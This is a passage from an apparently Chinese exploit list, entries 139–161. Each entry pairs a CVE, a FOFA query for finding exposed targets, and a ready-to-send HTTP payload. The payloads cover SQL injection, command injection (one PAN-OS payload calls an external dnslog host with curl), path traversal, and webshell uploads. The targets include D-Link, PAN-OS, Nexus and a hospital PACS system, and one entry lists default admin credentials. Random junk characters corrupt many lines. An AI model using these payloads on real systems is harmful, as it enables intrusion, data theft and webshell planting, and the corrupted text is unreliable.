- C" y8 f8 I& _0 w
+ F' ~% J9 q# }# I9 Y i) q8 h( }, H, ]
139. 福建科立讯通信指挥调度平台editemedia.php sql注入: s! r9 v y# s7 O! P6 M+ w4 X
CVE-2024-2622$ k$ ^; K( Q6 V: b' p1 h/ x
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" S) A- D! M$ \5 m
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
3 Z& {2 r- P1 p# q6 pHost: x.x.x.x
" [8 [& Y; X; ^5 U) j5 A h! SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, d5 u/ H# C* x& |( u1 E8 l2 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: T: D$ H* v6 H7 y2 p8 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; H: `7 X2 C4 p& b7 u
Accept-Encoding: gzip, deflate, br( s/ S1 H$ J" }+ d' l* E- K
Connection: close7 V6 T9 M5 i3 g' {
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk) f) ^8 W! g! z3 [
Upgrade-Insecure-Requests: 1
) Z" o% s. P. G& Y4 w
* Q* N% r! ?8 K' A: _6 Z4 ^& l1 a1 R. L& J$ i
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入* ?% {. l* W% q9 P2 S
CVE-2024-2566; Y0 P; q6 L% \. a
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"# R, {$ K3 B! o$ S" o
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
! k1 d! ?3 v" t( N5 h2 T( ^Host: x.x.x.x
) ?2 y0 d' I$ L. ~9 T. G, `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
- O' H( F7 p9 x9 x5 y$ WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( J3 R/ T P) Q& [& z! X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( k6 \8 H. ]& H1 v C8 \. ]5 f- S
Accept-Encoding: gzip, deflate, br5 L! g0 m4 D* p/ r# n& s$ \: Z
Connection: close
; _& y8 t: E3 i% D. UCookie: authcode=h8g9
2 P) q8 [, d e- p. ^: XUpgrade-Insecure-Requests: 1/ s0 M# V' U8 i/ ^
; ?+ n* m, m) J l* a; S
% y% T, O3 ^1 ]; K
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入! ^7 D% e! R' n: s `4 E
FOFA:body="指挥调度管理平台"
# L1 u3 C3 C: a _POST /app/ext/ajax_users.php HTTP/1.1
0 N5 {8 O* e& O t# jHost: your-ip
7 U5 s9 [2 A2 h, \0 WUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info8 w# J9 d' e9 r8 p9 ]+ P
Content-Type: application/x-www-form-urlencoded
9 S9 t5 G8 q4 B# ~3 P1 z$ @, n! C1 u% J6 ]% t% X& R
+ |# q; M, i, S2 p6 I+ Fdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -# ]$ [+ G) U% F+ D& n
7 T1 ^) |$ u( f( R6 `9 t
4 s( g# m$ u1 V142. CMSV6车辆监控平台系统中存在弱密码
8 D2 j# ] X' @3 U. V, ]CVE-2024-29666- r! z& ]; y+ l) L; P D" @
FOFA:body="/808gps/"0 _9 c4 \, w. g! W: _9 L
admin/admin
+ a+ i9 ^' L& L3 O143. Netis WF2780 v2.1.40144 远程命令执行8 E5 n3 y( u" D# C5 W4 L+ P
CVE-2024-25850" i8 Q9 q0 r1 M6 T+ o
FOFA:title='AP setup' && header='netis'( \- g& e, x: [# c0 m$ o* L
PAYLOAD
! K+ G+ }) ^+ t# p" r0 @
' I' \+ a8 a; w0 R- C144. D-Link nas_sharing.cgi 命令注入
( ?" ]" n: h' @' V0 B7 M$ r# hFOFA:app="D_Link-DNS-ShareCenter"
# A% h* M% u& {1 u" Ysystem参数用于传要执行的命令
- M+ b7 k4 g! {8 A2 ]GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.14 P; j7 ?/ X* ^+ K+ ^8 V3 i5 D+ Y
Host: x.x.x.x" {$ D" f$ V' t4 F7 l- B3 j# c+ q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.02 X- U( l, [; _3 s7 `6 f
Connection: close
( r" B# x9 n" BAccept: */*
" u; c2 i! m/ k; MAccept-Language: en
, s: Z8 J2 y, g. z3 E2 Z. E6 H7 C( PAccept-Encoding: gzip0 P; q% f2 U; q7 u5 H0 Q
1 c4 N8 o5 h: @$ Y1 @/ P4 U3 W
$ D( _" x" i% E( q, z9 ^+ }* k145. Palo Alto Networks PAN-OS GlobalProtect 命令注入6 U" S: @! y( l. ]( C, m
CVE-2024-3400
. J& q) X, k, e0 jFOFA:icon_hash="-631559155"
# B; e& J& Y. m+ B: LGET /global-protect/login.esp HTTP/1.1
+ n! d: ?4 M5 s: W/ dHost: 192.168.30.112:1005) Q8 Y9 l5 k6 J/ r; u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
, n* X& f0 J0 f% S7 ], q1 }Connection: close
2 {. I& s3 V$ r0 U9 i7 N) |& @Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
; P2 t# v+ C% CAccept-Encoding: gzip- C" |6 B; ?* j
' X% e2 V1 e; ], q Z9 [+ D9 F. v9 l
9 g* |" T) j( D1 l: k1 M8 i146. MajorDoMo thumb.php 未授权远程代码执行5 E, Q- E: L; f& F
CNVD-2024-02175
* X2 w r' k/ b. m7 F: TFOFA:app="MajordomoSL"' p0 q. B. N$ o
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
: P+ d; \1 K9 n% a7 O$ rHost: x.x.x.x
/ a+ i0 B4 h: K/ W' J* OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
- O2 b( [2 M3 z5 W. K1 `4 e% aAccept-Charset: utf-86 k; x8 B2 O8 q; d7 w0 g" Z3 A
Accept-Encoding: gzip, deflate
% S$ ?( p7 d% v3 \+ v! B# NConnection: close
" \3 c5 j \+ w$ \$ ^; x. v4 X9 S$ M1 p; W( |, t9 j
Y" b3 m5 |( @0 i$ h1 H( U1 F( f
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
% }4 F# R3 h4 v+ v- ^CVE-2024-32399! W/ a% T k) @
FOFA:body="RaidenMAILD"6 V; F- F( n: X* r9 |, N
GET /webeditor/../../../windows/win.ini HTTP/1.1
; x2 k: C8 c: z3 \ pHost: 127.0.0.1:81' P. _: S! x/ ^5 X. e, r
Cache-Control: max-age=0# T9 R3 s$ w8 C Q1 f2 l% Y) Q, @2 [
Connection: close" Z, o! s, l) r( i# o
) o, d7 K+ c% W1 B: y, p2 @" m( x* F" L; O1 p" ^1 R9 m2 D, U
148. CrushFTP 认证绕过模板注入+ U7 j" Q6 g8 V ?5 ^
CVE-2024-4040
3 N8 H; S: ]8 I& T7 A& mFOFA:body="CrushFTP"! D7 |& `# X( | F
PAYLOAD
* \& J+ J4 Y5 i- _# V+ B: O. c; ?$ v% H
149. AJ-Report开源数据大屏存在远程命令执行
- H5 Q. n2 K1 P3 u f; o7 dFOFA:title="AJ-Report"
4 l: ~ E' K+ W$ A
( a7 K) \* F' J* T$ ?8 _ NPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
8 A: R$ m8 P0 qHost: x.x.x.x
9 S+ F) K/ g' p: R! O; B, h- V5 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 z$ |0 _% Q& L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 N" q; @" Y) E$ OAccept-Encoding: gzip, deflate, br
5 D c" `0 x7 H8 O: D( ^+ N0 zAccept-Language: zh-CN,zh;q=0.92 P3 q* D3 f% v! ?9 O2 U$ w
Content-Type: application/json;charset=UTF-89 k( O# q! P9 S: d z! `3 S9 K0 Q
Connection: close
, P1 ]# ^! a6 ]
9 r, X/ {" M0 k( t! _{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; z4 G4 }, {# J6 y1 d& W2 G) a
4 F( Q6 X0 R9 T# x( Q/ q0 n; M
150. AJ-Report 1.4.0 认证绕过与远程代码执行
( u4 ]# O+ F& z7 l6 cFOFA:title="AJ-Report"! E) G/ s! Y/ [9 I! \2 I
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
" f0 [ t, Y5 g$ Q1 T! bHost: x.x.x.x
% _5 \! I- h! B- M HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 H% G+ g$ P% A* w# V' D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) V9 E; f; C n- o
Accept-Encoding: gzip, deflate, br
1 X1 e' c( \7 x# f! {% |5 [3 c5 a9 x2 i" \Accept-Language: zh-CN,zh;q=0.9
O# s+ W3 _4 V2 G- h4 H$ IContent-Type: application/json;charset=UTF-8/ r. v6 w9 T2 E: \
Connection: close
1 m1 d+ p+ ~1 j4 [Content-Length: 339
$ e( U" q8 h- b H
2 q( A, O4 d; e$ G! y6 T% A{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}6 J) v) [1 `- e* t, Z; V
+ C7 _1 E% U! d. L4 E' [$ O
" |; p" L5 K9 {3 L" R& M+ c& P151. AJ-Report 1.4.1 pageList sql注入; Q/ S, k, C/ a/ a. U% q$ ]0 W( U' Z* U* ~
FOFA:title="AJ-Report"
6 U6 {: h; \1 ~/ {* ?GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1" q+ J% [, V. {* m
Host: x.x.x.x/ L& c/ b- N" e4 g0 B- A7 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ L- R4 D0 F+ D2 J( u& D
Connection: close
' I/ K, H+ p. ]/ N3 qAccept-Encoding: gzip
! X( [; f! N( z! b* d; X) b& D* x B, q1 C
N. g1 f' L, r' L1 M9 T
152. Progress Kemp LoadMaster 远程命令执行
2 z& t3 ~* w2 I5 j3 M- `CVE-2024-1212) ?$ I2 Q; [1 R1 O, M) R+ d7 o
LoadMaster <= 7.2.59.2 (GA)
8 x" n2 L3 R q ^0 U/ x8 \5 LLoadMaster<=7.2.54.8 (LTSF)! V* R$ J2 H' a0 N! R) u% Z
LoadMaster <= 7.2.48.10 (LTS)$ K" A3 E8 v. w7 Z1 J
FOFA:body="LoadMaster"
* n( v$ H9 {8 B5 ?" R$ O4 n. h( F1 PJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
; }+ X( d! K' U& ?6 A' _: |GET /access/set?param=enableapi&value=1 HTTP/1.1
& ~3 I# v3 M) k, Q BHost: x.x.x.x
: x/ C: b5 p2 L5 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
) j9 e0 M8 f; M; C0 G0 j- }Connection: close& P. ~" B# @! l% }; v
Accept: */*8 Q P+ `5 o+ T
Accept-Language: en
8 t+ O2 g8 A5 W& d+ JAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=. G+ V2 }; l; I
Accept-Encoding: gzip- @1 b3 K) J8 _+ j: m$ v1 D/ k
6 E2 p$ B" |! ]) x# H/ R
2 \4 A+ U0 u9 i, V: G3 Z+ j4 c! I
153. gradio任意文件读取
' U8 A8 H Q' X$ lCVE-2024-1561FOFA:body="__gradio_mode__"
3 [( z( N/ v1 N0 X第一步,请求/config文件获取componets的id5 x$ h' u) Z' Z( T" Q
http://x.x.x.x/config
7 Z& t; U& y2 T5 L! v0 n+ Y
& b" O1 w) R! U, ^9 n4 t; s
9 X+ v% N$ R( [" G. p0 z' j第二步,将/etc/passwd的内容写入到一个临时文件3 d: T2 x9 S, ]7 S8 o
POST /component_server HTTP/1.1) u- q" c5 O8 j: I* _
Host: x.x.x.x0 p) u2 O" J: q3 S$ z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
% F* T) z/ j' m8 E- J& k* wConnection: close4 x) V2 u/ |! W
Content-Length: 115
3 x/ u. l/ K4 K, sContent-Type: application/json
9 E& v; i/ P0 V- ~Accept-Encoding: gzip! _) t8 ?5 \6 Y% Q/ j
( Y3 G+ v" y9 Z5 w
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}0 ]( \8 {; v, i+ n1 d, |9 i0 P6 ]
" E' X* _" ~- [* h+ O" R) L3 ]7 S# x* E% j( X+ Y
第三步访问
) h$ R5 t1 c0 n s" Y* ?http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
* M. g* { I4 D% m8 _5 M9 } P! P' h! v6 M- T i( Q# v2 _
1 n2 R2 y. ^. A; i
154. 天维尔消防救援作战调度平台 SQL注入9 S5 @" K6 @& M, U1 Y2 z( S
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"$ n4 _, X' q- _: I) {# \
POST /twms-service-mfs/mfsNotice/page HTTP/1.12 k9 W9 M7 s" m+ n6 k/ O$ S
Host: x.x.x.x
, e: b. a% L e4 tContent-Length: 106: I; k$ I/ A) X0 @# J/ G' a
Cache-Control: max-age=0
; {5 I/ `3 i+ q) qUpgrade-Insecure-Requests: 1
) x% P5 n) H! @Origin: http://x.x.x.x
) J2 L9 k" J' }; l8 w, ^0 bContent-Type: application/json; y' m/ Z; S8 l6 }; z) X* f6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
6 {5 c- _0 @& w Y4 Y! MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 z1 I. D7 P( z+ ]Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
8 Z8 r6 f7 L0 y# u+ c" |Accept-Encoding: gzip, deflate
' [7 b% X: R) H1 Y6 R/ F3 sAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+ V+ ^6 t- w( M( @0 W% w9 i, Q1 DConnection: close
2 J, o8 d8 z/ b" L' {( \. c: Z9 {& ] Z( r' }! o# w7 n' X3 c
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
: l' O# S3 o X# b- x- B& e1 i6 V2 O9 p9 ?% F' e& a' Z; B
0 ^: `2 D8 _( ]+ X
155. 六零导航页 file.php 任意文件上传
|. g8 ~6 {7 s& K9 {1 Z0 O" XCVE-2024-34982" o D- G/ P# C4 z
FOFA:title=="上网导航 - LyLme Spage"
. U I$ L. ?+ v. u% cPOST /include/file.php HTTP/1.17 l3 E3 ]0 d' V; R& `
Host: x.x.x.x
5 e4 I5 c, B3 h) ?5 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 Q3 T% T$ z9 ]$ e5 m( Z& u6 x* o
Connection: close
5 X' U# E/ _# @/ PContent-Length: 232& @* ?; @% w# Z4 P, U6 f$ B
Accept: application/json, text/javascript, */*; q=0.01
+ Z% q- l9 l0 qAccept-Encoding: gzip, deflate, br, q9 m& o' }6 \9 w; H9 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 G, q2 [6 b+ _) QContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f/ n# ^0 b1 O( M% @) f2 E) \
X-Requested-With: XMLHttpRequest6 h4 ], `0 b! |
; B ~% d4 v" B8 {, }2 S1 d-----------------------------qttl7vemrsold314zg0f9 M5 l9 a [: W8 i
Content-Disposition: form-data; name="file"; filename="test.php"
+ j) r# r3 h9 R8 lContent-Type: image/png# [6 }5 T* }8 I+ k+ `0 P
9 B0 b" o, w+ x3 D6 G
<?php phpinfo();unlink(__FILE__);?>
3 U# Q6 h0 `$ u+ F' M6 M-----------------------------qttl7vemrsold314zg0f--! J3 v" H+ U4 ^1 S1 w& d
& g- Q, g- H1 e3 p) N0 s0 g
0 `* @8 E+ [. i* Q) _$ H/ O. K访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
% X: l; D) j# b) m
, b& ]1 o) a5 y4 ^! ~* B# J156. TBK DVR-4104/DVR-4216 操作系统命令注入; g6 R: W0 N2 n) z/ F
CVE-2024-3721 k) m/ c7 x9 I! {8 n8 ~5 C5 u: ^, z
FOFA:"Location: /login.rsp"
8 }# \3 Q @$ M8 g" w·TBK DVR-4104
3 q( G' }# Y8 O H: z) D' o·TBK DVR-42160 K- N$ z! O4 P8 u1 H
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1" X1 P5 ^' ], `
p+ R4 j/ c5 l" d# i
! O" C$ M& f! q2 ^0 P
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
1 {6 S8 h: l6 ?; ~3 e/ C' uHost: x.x.x.x
- [( G3 ?8 ^8 c1 l6 _User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! ]% q( M7 `% I: a" l( H
Connection: close
+ Q. S* B/ ?; X$ sContent-Length: 0
! R- W! c& u! L) E6 k; v/ OCookie: uid=1
! r) e" r0 D- H6 C2 M3 fAccept-Encoding: gzip
0 y% w- L+ L! g& t$ W) f, Q
" K& }# e. Q6 d' P; j; @/ ?7 N+ s! E0 g. M, D' f) W
157. 美特CRM upload.jsp 任意文件上传
, q; ]7 [; j; v" H. N; RCNVD-2023-069710 [& r5 D6 S) d1 `( C% w
FOFA:body="/common/scripts/basic.js"
: Q& b% V1 {* Y5 m/ [# T) H- oPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1( r1 ]+ w( p4 s# M$ r, ]
Host: x.x.x.x
+ q8 f1 k* r5 z& `8 _' R# w8 @' n: LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 k1 Q+ q* ~, Q2 P4 y! a4 S( p
Content-Length: 709
+ d( s8 B* m" V9 I# ?5 s2 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ f9 y- t+ O! c; _# O+ ]+ E" KAccept-Encoding: gzip, deflate
7 i7 Q9 M0 n- ^4 L: U/ \3 cAccept-Language: zh-CN,zh;q=0.97 {9 Y7 W" H; ?% }
Cache-Control: max-age=0
/ M" J' i4 }% c d6 s% u; W2 SConnection: close
; K7 B0 j/ i$ ?6 Z, |' QContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
+ o' |: O2 p1 q" o! qUpgrade-Insecure-Requests: 1' ?- v$ A& m0 n9 a( p
; D& B) _6 ?1 }+ X------WebKitFormBoundary1imovELzPsfzp5dN
F+ @+ l& c: b+ l5 \Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"/ n* ?" F0 N% h% m
Content-Type: application/octet-stream
; z- O9 i* o! ~, j& U
0 }2 U- B: O& j7 knyhelxrutzwhrsvsrafb9 V3 }: z8 W0 b: E5 t' {% b2 P
------WebKitFormBoundary1imovELzPsfzp5dN+ _7 V0 X' j5 M3 T7 t& Y$ a, G
Content-Disposition: form-data; name="key"3 E5 s( {0 y: ?! Q% e
: L% x. k& P: s+ s2 M5 Dnull
! F, L' P8 [: X$ X------WebKitFormBoundary1imovELzPsfzp5dN. J/ _9 h: ]. F3 `% } W! q
Content-Disposition: form-data; name="form"2 m, t) p0 {- X) ~0 m2 g( T
$ F: ]! O3 `; l5 S* C8 tnull6 E7 x+ H0 K0 @7 g- T7 P
------WebKitFormBoundary1imovELzPsfzp5dN2 o1 P9 X. o! q3 m9 L) y9 w
Content-Disposition: form-data; name="field"
) e. r$ j' h& C
1 \$ v3 Y `) d, Unull& p6 M6 N4 U& F5 l7 I' B( c, w: i0 ]$ K
------WebKitFormBoundary1imovELzPsfzp5dN: I+ l/ T% M1 Z0 \
Content-Disposition: form-data; name="filetitile"
" K7 a' A3 S1 Z. J0 `
( I8 E b9 Y- N9 l5 R* R9 W/ g/ onull
- a' M- g, N1 s# ~3 z7 O$ z------WebKitFormBoundary1imovELzPsfzp5dN. z. ^2 s8 x# M" O" P ~2 Z
Content-Disposition: form-data; name="filefolder"8 \, J( A4 ^. A3 q3 X" u
7 e/ V$ c$ X2 {$ o" v
null
, |1 o2 x6 a; `3 _------WebKitFormBoundary1imovELzPsfzp5dN--
( a9 b1 A: R+ |3 r/ J- s- U, Q# m, M0 t' h& z7 n2 ]
- ~* p) `) G; O3 u& r) o" g5 g# _
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp" C) c+ \- E9 r! A% Z4 W# V
( x6 w0 \/ _7 M9 |8 E158. Mura-CMS-processAsyncObject存在SQL注入1 u8 H( a( m8 R: P
CVE-2024-32640
5 y" I. s, _6 ?2 } O$ K3 wFOFA:"Generator: Masa CMS"# h+ _ _3 [7 L# t, k' K R$ N
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.19 U+ a# ~1 Z# ] ?, u( Q/ I
Host: {{Hostname}}. W$ ^) J& ?- T7 @5 x
Content-Type: application/x-www-form-urlencoded
* ~% k7 K) B8 P- E! [+ k( o0 P0 D" U. @: c9 q* U4 x
object=displayregion&contenthistid=x\'&previewid=18 w, s% c" K7 x' Z/ T0 T
) X/ p% h/ T" C1 l6 X/ W7 O7 T
7 b! Y' N' _! e7 |/ q159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传" E; S) r, K3 `) q4 B# J, T3 I- @
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"), O1 Y' W. v; t+ J B& s9 ]
POST /webservices/WebJobUpload.asmx HTTP/1.1; q& v+ `4 I% o
Host: x.x.x.x
! ]0 @* B+ k) y2 e! B7 Z! W& U! MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
: G5 Q# L0 O' v/ W! `Content-Length: 1080' P% d" t8 K- I( M* h/ l
Accept-Encoding: gzip, deflate
3 k7 h' `; u. p3 E) f( b/ kConnection: close
3 h' @3 k3 [4 I9 e/ f$ OContent-Type: text/xml; charset=utf-8
! X8 O, ?( _( F# D: ^Soapaction: "http://rainier/jobUpload"2 w! W& `9 j* v
- Q5 x- b! H& p/ L' f<?xml version="1.0" encoding="utf-8"?>2 x* c' [/ Z( y( E+ ~9 C
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">+ u2 R- q- N( e V7 z" `) y( l
<soap:Body>
& ~6 e2 [! D) R/ ]% Z6 h! b<jobUpload xmlns="http://rainier">3 q' {. m6 m" ?9 b4 r
<vcode>1</vcode>
+ Y$ U" g/ r- ^5 m& ]; I! f" `5 \<subFolder></subFolder>
' m% j( V& _0 e' e6 |3 ]( h" n<fileName>abcrce.asmx</fileName>* Q+ n8 S9 `4 W$ v' r
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>4 I. {# @, S7 x
</jobUpload>8 h) ~) X0 X/ y% k3 @0 h- K% s) O
</soap:Body>' g, n+ r: _4 ?" K* q
</soap:Envelope>
3 {8 k% ~& s: h2 }1 X; D# x) c- e. { Y% d7 K7 c9 y) y& N
4 m( U2 T( U' P3 R! h7 U6 [1 C
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World"); g0 ^$ d w) X! g+ D5 \ u- A
: V$ Y8 d y# q+ ~+ f' w( M
. U9 B; t \: _$ H B/ o160. Sonatype Nexus Repository 3目录遍历与文件读取: e$ D" y" b* V. |
CVE-2024-4956
2 J' s6 m+ |& x, A3 E v0 l4 bFOFA:title="Nexus Repository Manager"
0 D _4 A' M% b* h4 p# |. wGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
% r: D! b: G- S" J8 \Host: x.x.x.x4 b7 j$ C2 }2 K7 B& j
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.06 ~; z+ p" b9 k
Connection: close- l9 s9 d( ?8 ] A
Accept: */*
4 u/ g1 Z7 @- a0 x3 _Accept-Language: en& ~- ?" t5 U4 R' l, j
Accept-Encoding: gzip N* V# `2 l" n$ Y! I9 i
4 u5 t3 Q- a4 @- V8 \
% ^2 I" e9 o4 ?161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
G9 ~ C& i8 Q1 q" q& u4 E9 oFOFA:body="/KT_Css/qd_defaul.css"3 W' k+ O5 W. {% L# R. E/ m, ?, L& |
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密4 `# g; j! C0 `. `" D: D& W9 r/ h
POST /Webservice.asmx HTTP/1.1
8 \1 w L9 K4 Z5 K3 gHost: x.x.x.x
% ~: ^" M; t1 S9 m' fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
9 E3 _/ _2 o! u" B$ h" oConnection: close
; c w' `. U& c( i+ b2 e* mContent-Length: 445
* B' ~9 t1 c1 \( |* t2 VContent-Type: text/xml
